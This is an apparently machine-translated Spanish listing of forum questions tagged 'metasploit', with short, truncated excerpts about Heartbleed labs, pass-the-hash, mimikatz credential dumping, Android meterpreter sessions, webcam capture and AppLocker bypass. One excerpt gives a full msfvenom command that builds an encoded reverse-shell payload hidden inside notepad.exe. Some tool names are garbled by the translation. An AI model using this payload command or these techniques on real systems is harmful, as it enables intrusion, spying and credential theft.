Preguntas con etiqueta 'metasploit'

preguntas con etiqueta
1
respuesta

Ayuda para crear un servidor vulnerable Heartbleed

Estoy usando la red interna de Virtualbox con Kali Linux y Ubuntu 12.04. La versión de OpenSSL para Ubuntu es 1.0.1 que debería ser vulnerable. He creado un servidor HTTPS usando nginx en Ubuntu y cuando escaneo con nmap en Kali Linux, muestra q...
hecha 17.12.2016 - 00:47
2
respuestas

Pase el hash para identificarlo como usuario de dominio en lugar de quedarse atascado como NT Authority \ System

Recientemente, descubrí que pasar los creds de administrador local y administrador de dominio a una máquina remota con Windows 7 produce el mismo resultado: obtengo acceso a esa máquina como NT Authority \ System. La única forma que encontré par...
hecha 14.09.2016 - 19:41
1
respuesta

Error al usar el módulo mimploz de metasploit

Estoy trabajando para descargar contraseñas de texto simple de una máquina comprometida (es mi computadora, investigación, bla bla bla) De todos modos, recibo un error extraño cuando ejecuto el módulo metasploit en una sesión de meterpreter....
hecha 17.09.2016 - 00:57
1
respuesta

Tomcat War Payload no funciona

Así que actualmente estoy trabajando en algunos libros. Uno de los cuales me hizo descargar la mx de metasploitable2. Esta máquina tiene un servidor tomcat ejecutándose en ella que exploté con éxito utilizando Metasploit. Utilicé Metasploit pa...
hecha 14.09.2016 - 13:26
1
respuesta

¿Cómo hago esta instrucción usando msfvenom?

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -x /tmp/notepad.exe LHOST=192.168.10.1 LPORT=45631 -b "\x00" -f exe-only > notepad.exe y luego, si descargo notepad.exe en Windows 7, quiero i...
hecha 08.09.2016 - 04:43
2
respuestas

Msfvenom meterpreter arquitecturas de android

¿Hay alguna arquitectura de Android que pueda configurar mi contador de medidor reverse_http para que funcione en todos los teléfonos Android? Básicamente, cuando no configuro ninguna arquitectura, la configuración predeterminada es dalvik, p...
hecha 27.09.2016 - 15:33
1
respuesta

Android meterpreter sesión no válida

Cada vez que uso un https invertido del medidor de metro en un teléfono Android a través de Internet, se crea una sesión, pero después de unos segundos dice que la sesión no es válida y se cierra. Cuando lo hago en la LAN funciona bien. Entonces...
hecha 26.09.2016 - 15:54
1
respuesta

advertencias de Webcam_snap de Meterpreter [cerrado]

Desde que actualicé metasploit cada vez que ejecuto el comando webcam_snap en meterpreter, recibo muchas advertencias como las siguientes, ¿por qué aparecen? Gtk-WARNING **: Theme parsing error: gtk-contained-dark.css:498:67: Using one color s...
hecha 26.09.2016 - 14:06
2
respuestas

Cómo usar el eximétrico medidor autónomo con una llave USB conectada a una sesión de víctima desbloqueada

Cuando necesito hacer un POC sobre por qué es peligroso dejar la sesión desbloqueada, solía poner un mimikatz en una llave USB y obtener las credenciales de inicio de sesión en texto claro. Pero a veces el cliente no tiene privilegios de depurac...
hecha 06.07.2016 - 14:31
1
respuesta

Bypass de Prevención de Ejecución de Applocker - Parámetro de sesión

Todavía soy nuevo en Metasploit y estoy intentando explorar el siguiente módulo: 1- Nombre del módulo: exploit / windows / local / applocker_bypass hice: 1- usar exploit / windows / local / applocker_bypass 2- establecer TARGET Tager_Win...
hecha 26.07.2016 - 14:49